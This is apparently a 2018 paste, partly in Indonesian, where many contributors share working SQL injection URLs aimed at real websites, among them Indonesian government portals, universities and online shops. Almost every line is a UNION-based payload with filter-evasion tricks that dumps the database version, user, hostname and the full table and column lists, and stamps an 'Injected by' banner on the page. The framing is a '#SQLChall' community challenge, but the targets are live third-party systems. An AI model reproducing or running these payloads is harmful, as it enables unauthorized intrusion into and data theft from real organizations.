· 8 years ago · Jul 26, 2018, 10:34 AM
1Query : http://www.stoneystraps.com/products-details.php?id=-35%27 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,"Fansa~",19,sqlite_version(),21,22,23,24,25,26,27,28,29 from sqlite_master-- -
2Query : https://www.yarsi.ac.id/alumni/news.php?id=11%27 and .0Union-- -%0A%53elect 1,2,3,4,'Injected by Fansa',@@version,7,8,9,10,11,12,13,14,16,16,17,18,19,20,21,22,23,24,25,26,27,28,29,20,31,32,33,34--+
3Query : http://disperikanan.gresikkab.go.id/beritadetail.php?ID=22 and x(point(0,0)) /*!50000union*/ select 1,2,Concat('Injected by Fansa<br>',user/**x**/(),0x202f20,database/**x**/(),0x202f20,@@version),4,5,6,7-- -
4Solution : and x(point(0,0)) -- -
5http://pn-ciamis.go.id/beranda.php?page=berita_selengkapnya&kd_berita=.68 /*!50000union*/ /*!50000select*/ 1,2,3,concat/**_**/('<br>','<img src="https://vignette.wikia.nocookie.net/disney/images/0/03/Miguel-dante.png" height="200" width="200">','<br>','<font color="red"> Inject By Baim','</font>','<br>','<font color="red"> Version :: ',version/**_**/(),'</font>','<br>','<font color="red"> Database :: ',database/**_**/(),'</font>','<br>','<font color="red"> Port :: ',@@port,'</font>','<br>','</font>','<br>','<font color="red"> Hostname :: ',@@hostname,'</font>','<br>',(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/ (@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),5,6,7--+
6http://www.zixem.altervista.org/SQLi/lvl8.php?id=-1%0bunion%0bselSELECTect%0bconcat(0x4b686174756c697374697761203a3a3a20,version()),2,3%23
7https://www.gallery7.com/prod-details.php?code=713+and+false+union+select+1%2C2%2C3%2C4%2Cconcat%280x3c696d67207372633d2268747470733a2f2f65646d6c692e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031382f30342f363230783331302e6a7067222f3e20%2C0x496e6a6563746564206279206d33333769676874%2C0x3c62723e4d7953514c2056657273696f6e203a3a20%2Cversion%28%29%2C0x3c62723e43757272656e742055736572203a3a20%2Cuser%28%29%2C0x3c62723e506f7274203a20%2C%40%40port%2C0x3c62723e56657273696f6e203a20%2C%40%40version_compile_machine%2C0x3c62723e4f73203a20%2C%40%40version_compile_os%2C0x3c62723e4469726563746f7279203a20%2C%40%40datadir%2C0x3c62723e546d70203a20%2C%40%40tmpdir%2C0x3c62723e53796d6c696e6b203a20%2C%40%40GLOBAL.have_symlink%2C0x3c62723e53534c203a20%2C%40%40GLOBAL.have_ssl%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36--+
8My query : https://alumni.unud.ac.id/umum.php/?id=-2334%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x496e6a6563746564206279205448414e4f53,0x3c62723e,0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x4469726563746f7279203a3a20,@@datadir,0x3c62723e,0x486f73746e616d65203a3a20,@@hostname,0x3c62723e,0x55736572203a3a20,user(),(select(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(select+(@a)+from+(information_schema.columns)+where+(table_schema!=0x696e666f726d6174696f6e5f736368656d61)+and(0x00)in+(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),Concat(0x3c62723e,0x5461626c65203a3a20,@tbl:=table_name,0x3c62723e7e20,column_name),concat(0x7e20,(column_name)))))))a)),NULL,NULL,NULL-- -
9
10Erik Hutabarat : https://alumni.unud.ac.id/agenda.php?id=.48+union+select+1111%2C2222%2C3333%2C4444%2C5555%2C6666%2C0x496e6a65637433642042792048616e64736f6d6577617265%2Cgroup_concat%28user%28%29%2Cversion%28%29%2Cdatabase%28%29%2C%28select%28select+concat%28%40%3A%3D0xa7%2C%28select+count%28%2A%29from%28information_schema.columns%29where%28%40%3A%3Dconcat%28%40%2C0x3c6c693e%2Ctable_name%2C0x3a%2Ccolumn_name%29%29%29%2C%40%29%29%29%29--+-
11
12
13Aknanta : https://alumni.unud.ac.id/umum.php?id=-1%27+union+select+1111%2C2222%2C%2F%2A%2150000Concat%2A%2F%280x3c63656e7465723e3c666f6e74207374796c653d22636f6c6f723a677265656e3b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a65637465642062792053616e613c2f666f6e743e3c62723e3c696d672077696474683d22323430707822206865696768743d22323430707822207372633d2268747470733a2f2f7062732e7477696d672e636f6d2f6d656469612f4444463572306d55514145456951492e6a7067223e%2C0x3c62723e%2C0x55534552202d3e+%2CUSER%28%29%2C0x3c62723e%2C0x4441544142415345202d3e+%2CDATABASE%28%29%2C0x3c62723e%2C0x56455253494f4e202d3e%2CVERSION%28%29%2C0x3c62723e%2C0x486f73746e616d65202d3e%2C%40%40HOSTNAME%2C0x3c62723e%2C0x506f7274202d3e%2C%40%40PORT%2C0x3c62723e%2C%28select%28%40x%29from%28select%28%40x%3A%3D0x00%29%2C%28select%280%29from%28information_schema.columns%29where%28table_schema%3Ddatabase%28%29%29and%280x00%29in%28%40x%3A%3Dconcat+%28%40x%2C0x3c62723e%2Ctable_name%2C0x203a3a20%2Ccolumn_name%29%29%29%29x%29%29%2C4444%2C5555--+-
14
15
16
17Prostakov molchalin : https://alumni.unud.ac.id/umum.php?id=-3%27+union+select+1111%2CGrOup_ConCat%280x3c63656e7465723e%2C0x0a0a0a3c696d67207372633d2268747470733a2f2f656e637279707465642d74626e302e677374617469632e636f6d2f696d616765733f713d74626e3a414e64394763524d546c2d4c595953686e474c4934423165656c6a335f5476714c5666533437455f54496d79543141574c577354544865522d7722206865696768743d22313530222077696474683d22313530223e%2C0x3c63656e7465723e%2C0x496e6a65637465642062792062335f7730726b%2C0x3c62723e%2C0x4461746162617365203a3a3a20%2Cdatabase%28%29%2C0x3c62723e%2C0x55736572203a3a3a20%2Cuser%28%29%2C0x3c62723e%2C0x56657273696f6e203a3a3a20%2Cversion%28%29%2C0x3c62723e%2C0x486f73746e616d65203a3a3a20%2C%40%40hostname%2C0x3c62723e%2C0x44617461204469726563746f7279203a3a3a20%2C%40%40datadir%2C0x3c62723e%2C0x506f7274203a3a3a20%2C%40%40port%2C0x3c62723e%2C0x3c62723e%2C%2F%2A%2112345make_set%2A%2F%286%2C%40%3A%3D0x0a%2C%28select%281%29%2F%2A%2112345from%2A%2F%28%2F%2A%2112345information_schema.columns%2A%2F%29where%40%3A%3Dmake_set%28511%2C%40%2C0x3c6c693e%2C%2F%2A%2112345table_name%2A%2F%2C%2F%2A%2112345column_name%2A%2F%29%29%2C%40%29%29%2C3333%2C4444%2C5555--+-
18QUERY : https://indiansuperstore.in/product_detail.php?id=-1986+UNION+SELECT+1,concat('<img src="https://img00.deviantart.net/c2db/i/2017/273/8/5/toga_himiko_by_fitz2013-dbp1khp.png" height="300" </img>','<br>','INJECTED BY RESIS-07','<br>',user(),'<br>',@@version,'<br>',@@hostname,'<br>',database()),3,4,5,6,7,8,9,10,11,12,13,14,15--+
19 My Query :
20
21http://www.nisshinkyo.org/search/college.php?id=.156 +UNION+ALL+SELECT+1,concat(0x496e6a65637420427920596f757273656c66,"<br>",version(),"<br>",user(),"<br>",database(),"<br>",@@hostname,"<br>",@@datadir),(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174+--+
22
23Udje :
24
25http://www.nisshinkyo.org/search/college.php?id=-156%20union%20select%201,group_concat(0x3c696d67207372633d2768747470733a2f2f696d6167652e6962622e636f2f6e78526d75792f69636f6e312e706e6727206865696768743d27313025272077696474683d313025273e,0x3c62723e3c666f6e7420636f6c6f723d233133304534363e3c623e2e3a3a20496e6a6563746564206279204d722e34723748753132203a3a2e3c2f623e,0x3c62723e56455253494f4e203a3a20,version(),0x3c62723e4441544142415345203a3a20,database(),0x3c62723e484f5354203a3a20,@@Hostname,0x3c62723e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3c62723e,table_name,0x3a,column_name))))a)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174--+-
26
27Arif :
28http://www.nisshinkyo.org/search/college.php?id=-156+union+select+%201,Concat(0x3c63656e7465723e,0x3c696d67207372633d2268747470733a2f2f656e637279707465642d74626e302e677374617469632e636f6d2f696d616765733f713d74626e3a414e64394763524d546c2d4c595953686e474c4934423165656c6a335f5476714c5666533437455f54496d79543141574c577354544865522d7722206865696768743d22323730222077696474683d22323530223e,0x496e6a65637465642062792062335f7730726b,0x3c62723e,0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,@@datadir,0x3c62723e,@@hostname,0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174--+-
29
30Query w : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) UNION SELECT 1,2,3,4,5,6,7,concat('Injected by Fansa<br>',user(),'<br>',@@version,'<br>',database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
31
32Nikolas : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) union select 1,2,3,4,5,6,7,Concat('Injected By Hostketeer','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=CoNCaT(@x,'<br>',table_name,'::',column_name))))x)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
33
34Bayu : http://www.microtek.com/products.php?KindID=6&ID=1+limit+2%2C1+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C64%2C65%2C66%2Cconcat(%27</title>%27,0x496e6a6563746564206279204b686174756c697374697761,0x3c62723e,0x56657273696f6e203a3a3a20,version(),0x3c62723e,0x55736572203a3a3a20,user(),0x3c62723e,0x4461746162617365203a3a3a20,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),68,69,70--+
35
36Diwan : http://www.microtek.com/products.php?KindID=6&ID=1+And x(point(9,9))+UNION+SELECT 1,2,3,4,5,6,concat(0x496e6a6563746564206279202e2f57616e7a5f4944,'</br>',user(),'</br>',database(),'</br>',version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70--
37
38Rio : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,Concat('</title>','Injected By RHawkz404','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(SELECT GROUP_CONCAT(table_name,0x203a3a20,column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE())),68,69,70--
39
40Revo : http://www.microtek.com/products.php?KindID=6&ID=1 =75=75 union select 1,2,3,4,5,6,CONCAT('Injected by R3V0',0x3c62723e,USER(),0x3c62723e,DATABASE(),0x3c62723e,VERSION()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70--
41https://jdih.anri.go.id/indexdev.php?pages=peraturan&id_peraturan=-444 /*!50000%55nion*/ /*!50000%53elect*/ 1,2,3,4,5,Concat%280x696e6a65637465642062792052335630,0x3c62723e,user/**x**/%28%29,0x3c62723e,database/**x**/%28%29,0x3c62723e,@@version,0x3c62723e,@@hostname,0x3c62723e,@@datadir,make_set%286,@:=0x20,%28/*!50000%53elect%281%29/*!50000from*/%28/*!50000information_schema*/.columns%29where@:=make_set%28511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/%29%29,@%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- -
42https://jolemi.com/index.php?route=blog/article&article_id=74' having 0 union select 1,2,3,4,5,6,7,8,1,2,3,4,5,6,Concat('Injected By RHawkz404','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(SELECT GROUP_CONCAT(table_name,' :: ',column_name SEPARATOR '<br>') FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE())),8,1,2,3,4,5,6;%00
43https://jolemi.com/index.php?route=blog/article&article_id=-74%27+/*!50000UNION*/+ALL+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,/*!12345Concat*/(%27%3Cbr%3E%27,%27Inject%20By%20Cipuyz%27,%27%3Cbr%3E%27,%27Version%20::%20%27,version/**_**/(),%27%3Cbr%3E%27,%27Database%20::%20%27,database/**_**/(),%27%3Cbr%3E%27,%27%20Port%20::%20%27,@@port,%27%3Cbr%3E%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27User%20::%20%27,user(),%27%3Cbr%3E%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),14,15,16,17,18,19,20,21,22;%00
44
45
46 https://jolemi.com/index.php?route=blog/article&article_id=.74' union select 1,2,3,4,5,6,7,8,9,10,11,1,2,3,Concat('Injected By Hostketeer','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=CoNCaT(@x,'<br>',table_name,'::',column_name))))x)),5,6,7,8,9,10,11;%00
47
48
49Thanks buat solvers .
50Semoaga yg lain bisa belajar
51My query : http://www.ukrimuniversity.ac.id/detail.php?kt=20&kn=-311%27%20/*!50000union*/%20/*!50000select*/%20null,null,null,null,null,null,null,null,/*!50000concat*/(0x222f3e3c2f696672616d653e3c63656e7465723e3c2f6469763e3c2f6469763e3c62723e3c62723e3c62723e3c62723e,0x496e6a6563746564204279202e2f4b6173616e746170,0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x5665727369203a3a20,version(),0x3c62723e,0x446972203a3a20%20,@@datadir,0x3c62723e,0x506f7274203a3a2020,@@port)--+
52
53Query nikolas : http://www.ukrimuniversity.ac.id/Âdetail.php?kt=20&kn=.311 ' /*!50000union*/ select 1,2,3,1,2,Concat('Injected By Hostketeer','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>'),7,8,9-- -
54
55Query aknanta : http://www.ukrimuniversity.ac.id/Âdetail.php?kt=-20%27+%2F%2A%2150000UNION%2A%2F+ALL+SELECT+1111%2C2222%2C3333%2C44Â44%2Cconcat (%27%3Cimg%20src=%22Âhttps://pbs.twimg.com/media/ÂDDF5r0mUQAEEiQI.jpg%22%20width=%22240px%22%20height=%22240px%Â22%3E%27,"<br>",'Injected By xSana','<br>',database(),'<br>',version(),'<br>',@@port),6666,7777,8888,9999--%20-&kn=311
56
57Query henry thiago : http://www.ukrimuniversity.ac.id/Âdetail.php?kt=-1 ' /*!50000UNION*/ ALL /*!50000SELECT*/ 1111,2222,3333,4444,/*!50000Concat*/('Injected by Th!4g0','<br>','Database :: ',DATABASE(),'<br>','Version :: ',VERSION()),6666,77Â77,8888,9999-- -&kn=468-UniversitasÂKristenImmanuel
58Query : http://www.frwebhost.com/index.php?page=berita&no=8' and false /*!50000Union*/ Select 1,2,3,4,5,6,/*!50000Concat*/(0x3c62723e,'Injected by Fansa',0x3c62723e,'USER :: ',user(),0x3c62723e,'DATABASE :: ',database(),0x3c62723e,'HOSTNAME :: ',@@hostname,0x3c62723e,'VERSION :: ',@@version,0x3c62723e,'PORT :: ',@@port,0x3c62723e,'DIR :: ',@@datadir,0x3c62723e,make_set(6,@:=0x20,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),8,9-- -
59
60
61
62http://diskominfo.pesisirselatankab.go.id/berita
63post method:
64kata=%27 union select 1,2,3,concat('Injected by R3V0',0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -&msp=1
65
66
67Lucifear Raquel Randovlsky
68https://jdih.cianjurkab.go.id/ViewPerbub.php?id=-396+union+select+1%2CConcat(0x3c43656e7465723e,0x6b656e746f7420627920466174757220616b61204b696e67205a657230,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C),3,4,5--+
69Cindy Yuvia
70https://jdih.cianjurkab.go.id/ViewPerbub.php?id=-396+union+select+1%2C2%2Cconcat(@c:=0x00,0x3c666f6e7420666163653d27436f7572696572204e6577272073697a653d27342720636f6c6f723d27726564273e5b2b5d3c623e3c666f6e7420636f6c6f723d22626c61636b223e496e6a65637465642042792035756c37373768306e36683035743c2f666f6e743e3c2f623e3c2f613e3c62723e,if((select%20count(*)%20from%20information_schema.columns%20where%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c),4,5--+
71Relarizky
72https://jdih.cianjurkab.go.id/ViewPerbub.php
73?id=-396+and+@x:=(select group_concat(table_name,' : ',column_name,'<br>') from information_schema.columns WHERE table_schema=database())+union+select+1,@x,3,4,5--+
74https://jdih.cianjurkab.go.id/ViewPerbub.php?id=-396+union+select+1,2,3,4,5--+
75
76=== Write Up ===
77#IDChall
78#SQLChall
79
80Mine :
81http://www.dysautonomiainternational.org/page.php?ID=.30+/**//*!12345UNION%20SELECT*//**/+1,2,concat/**_**/(%27<br>%27,%27<img%20src="https://edmli.com/wp-content/uploads/2018/04/620x310.jpg"%20height="300"%20width="300">%27,%27<br>%27,%27Injected%20By%20m337ight%27,%27</font>%27,%27<br>%27,%27Version%20::%20%27,version/**_**/(),%27</font>%27,%27<br>%27,%27Database%20::%20%27,database/**_**/(),%27</font>%27,%27<br>%27,%27Os%20::%20%27,@@version_compile_os,%27</font>%27,%27<br>%27,%27</font>%27,%27<br>%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-
82
83Baim Kun :
84http://www.dysautonomiainternational.org/page.php?ID=-37%20/*!50000UnIoN*/%20/*!50000SeLeCt*/%201,2,concat/**_**/(%27%3Cbr%3E%27,%27%3Cimg%20src=%22https://vignette.wikia.nocookie.net/disney/images/0/03/Miguel-dante.png%22%20height=%22200%22%20width=%22200%22%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Inject%20By%20Baim%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Version%20::%20%27,version/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Database%20::%20%27,database/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Port%20::%20%27,@@port,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Hostname%20::%20%27,@@hostname,%27%3C/font%3E%27,%27%3Cbr%3E%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
85
86Owens Joko Prabowo :
87http://www.dysautonomiainternational.org/page.php?ID=-5+/*!12345union*/+/*!12345select*/+1,2,/*!50000CONCAT*/(%27<br>%27,%27<img%20src="http://www.bangladesherkhabor.net/resources/uploads/IMG-20180621-WA0099.jpg"%20height="200"%20width="200">%27,%27<br>%27,%27<font%20color="red">%20Injected%20By%20Mr.Zhydra145%27,%27</font>%27,%27<br>%27,%27<font%20color="green">%20Version%20::%20%27,version/**_**/(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20Database%20::%20%27,database/**_**/(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20User%20::%20%27,user/**_**/(),%27</font>%27,%27<br>%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
88
89Aknanta :
90http://www.dysautonomiainternational.org/page.php?ID=-103+/*!50000UNION*/+ALL+SELECT+1,2,/*!50000Concat*/(0x3c63656e7465723e3c666f6e74207374796c653d22636f6c6f723a677265656e3b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a65637465642062792053616e613c2f666f6e743e3c62723e3c696d672077696474683d22323430707822206865696768743d22323430707822207372633d2268747470733a2f2f7062732e7477696d672e636f6d2f6d656469612f4444463572306d55514145456951492e6a7067223e,0x3c62723e,0x55534552202d3e%20,USER(),0x3c62723e,0x4441544142415345202d3e%20,DATABASE(),0x3c62723e,0x56455253494f4e202d3e,VERSION(),0x3c62723e,0x486f73746e616d65202d3e,@@HOSTNAME,0x3c62723e,0x506f7274202d3e,@@PORT,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-
91
92Paw Paw :
93http://www.dysautonomiainternational.org/page.php?ID=.43+/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3C696D67207372633D2268747470733A2F2F692E70696E696D672E636F6D2F6F726967696E616C732F32352F30382F64372F32353038643735613166633161653165373734366134396261633236663637322E6A7067222077696468743D22373022206865696768743D223730223E,0x3C62723E496E6A65637420427920506978656C2D436F6465))),0x3c62723e3c62723e,0x3C666F6E7420636F6C6F723D6F72616E67653E4D7953514C2056657273696F6E203A3A20,version(),0x7e20,@@version_comment,0x3C62723E506F7274203A3A20,@@port,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3C666F6E7420636F6C6F723D6F72616E67652073697A653D333E,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,%202,%200x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203C666F6E7420636F6C6F723D626C75653E3A3A204461746162617365203A3A203C666F6E7420636F6C6F723D626C61636B3E28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-
94
95Rahmat Faisal Amin :
96http://www.dysautonomiainternational.org/page.php?ID=-5+/*!50000union*/+/*!50000select*/+1,2,/*!50000CONCAT*/(%27%3Cbr%3E%27,%27%3Cimg%20src=%22http://foogahsap.com/aw.jpg%22%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22gold%22%3E%20Injected%20By%20Z-I%20SLOW%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22silver%22%3E%20Version%20::%20%27,version/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22gold%22%3E%20Database%20::%20%27,database/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22silver%22%3E%20User%20::%20%27,user/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
97
98
99
100// Query SQLChall
101
102Site : http://disnakertrans.jatengprov.go.id/
103
